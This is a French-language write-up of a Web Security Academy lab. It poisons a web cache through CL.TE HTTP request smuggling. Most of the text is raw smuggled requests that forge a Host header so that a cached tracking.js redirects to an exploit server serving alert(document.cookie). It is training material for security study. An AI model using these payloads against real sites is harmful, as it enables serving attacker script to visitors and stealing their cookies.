Empoisonnement du cache web via HTTP Request Smuggling

Exploiting HTTP request smuggling to perform web cache poisoning

Lab: Exploiting HTTP request smuggling to perform web cache poisoning | Web Security AcademyWebSecAcademy

Le front-end et le back-end traitent différemment les requêtes HTTP. Le front-end ne prend pas en charge le chunked encoding et certaines réponses sont mises en cache.

L’objectif est de réaliser une attaque de request smuggling permettant d’empoisonner le cache : lors d’une requête suivante vers un fichier JavaScript, la victime doit être redirigée vers l’exploit server, qui renverra un script affichant document.cookie.

Le labo simule automatiquement un utilisateur victime : toutes les quelques requêtes POST que nous envoyons, la victime fait sa propre requête.

Payload sur l’exploit server

Nous préparons la réponse JavaScript malveillante :

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8


alert(document.cookie);

Informations sur le fichier tracking.js

On observe que la ressource est cachée pendant 30 secondes

Cache-Control: max-age=30

Age: 9

X-Cache: hit

Content-Length: 70



document.write('<img src="/resources/images/tracker.gif?page=post">');

Analyse du comportement du bouton “next post”

Le paramètre postId reste identique.
En cliquant, l’application effectue une redirection vers le post suivant.

Exemple de requête qui déclenche cette redirection :

POST / HTTP/1.1

Host: 0a5800f903d062e780880dfb00620034.web-security-academy.net

Content-Type: application/x-www-form-urlencoded

Content-Length: 46

Transfer-Encoding: chunked



0



GET /post/next?postId=3 HTTP/1.1

Test: A

Test : injection d’un header Host arbitraire

En remplaçant le host de la requête interne :

POST / HTTP/1.1

Host: 0a5800f903d062e780880dfb00620034.web-security-academy.net

Content-Type: application/x-www-form-urlencoded

Content-Length: 88

Transfer-Encoding: chunked



0



GET /post/next?postId=3 HTTP/1.1

Host: google.com

Content-Length: 11



test=test

Payload final pour rediriger vers notre exploit server

On injecte une requête GET interne contenant notre Host contrôlé :

POST / HTTP/1.1

Host: 0a5800f903d062e780880dfb00620034.web-security-academy.net

Content-Type: application/x-www-form-urlencoded

Content-Length: 137

Transfer-Encoding: chunked



0



GET /post/next?postId=3 HTTP/1.1

Host: exploit-0a94005103f762a980690cd701e3004c.exploit-server.net

Content-Length: 20



test=test

Dès que la victime chargera la ressource JavaScript mise en cache, le cache renverra pendant 30 secondes notre réponse modifiée, déclenchant :

alert(document.cookie)

Mis à jour il y a 3 mois

hashtagExploiting HTTP request smuggling to perform web cache poisoning

hashtagPayload sur l’exploit server

hashtagInformations sur le fichier tracking.js

hashtagAnalyse du comportement du bouton “next post”

hashtagTest : injection d’un header Host arbitraire

hashtagPayload final pour rediriger vers notre exploit server